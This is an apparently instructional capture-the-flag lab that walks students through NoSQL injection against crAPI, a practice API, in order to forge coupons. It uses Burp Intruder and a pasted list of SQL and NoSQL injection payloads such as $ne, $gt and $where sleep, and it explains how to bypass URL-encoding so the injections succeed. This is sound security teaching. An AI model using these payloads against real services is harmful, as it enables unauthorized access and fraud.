AP 106: NoSQL Injection (10 pts extra)

What You Need

Purpose

To forge coupons via NoSQL Injection.

Connecting to crAPI

Open Burp. Click the Proxy tab. Click the Intercept tab.

Click the "Intercept is on" button so it changes to "Intercept is off".

Click the "Open Browser" button.

In Burp's browser, go to

https://crAPI.samsclass.info The crAPI login page opens, as shown below.

Logging In

In Burp's browser, log in to crAPI with any account. If you don't have account credntials handy, click SignUp and create a new account.

You see the "Vehicles Details" page, as shown below.

Viewing the Shop

At the top of the crAPI page, click Shop.

At the top right, click "Add Coupon".

In the "Enter Coupon Code" box, enter a few characters, as shown below, and click Validate.

In Burp, on the HTTP History tab, click this request:

POST /community/api/v2/coupon/validate-coupon

The request contains only one JSON parameter, at the bottom of the image shown below.

Right-click this request and click "Send to Intruder".

Testing Injections

Click the Intruder tab.

Click the "Clear §" button.

Higlight the coupon_code value, as shown below, and click the "Add §" button.

Your window should look like the image below.

Click the Payloads tab.

Copy this list of SQL and NoSQL payloads and paste it into the Payload Options box: 

'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where":  "sleep(1000)"}
Your window should look like the image below.

At the top right, click the "Start Attack" button. Click OK.

Burp opens a new window and performs the attack.

The replies all have Status 500, as shown below. Apparently the injections are failing.

Examine a request containing curly braces, as shown below. The curly braces are being URL-encoded! That is likely to block the injection.

Eliminating URL Encoding

Close the "Intruder attack" window.

On the Intruder tab, on the Payloads sub-tab, scroll to the bottom and clear the "URL-encode these characters..." box, as shown below.

Perform the attack again.

Now the server responds with some status 422 messages: "invalid character...", as shown below.

Removing Quotes

Close the "Intruder attack" window.

On the Intruder tab, on the Positions sub-tab, at the bottom, remove the quotes around the injection, as shown below.

Perform the attack again.

Some of the injections succeed with Status 200, as shown below.

Flag AP 106.1: coupon_code (10 pts)

The flag is covered by a green rectangle in the image below.

Source

Hacking APIs

Posted 5-7-22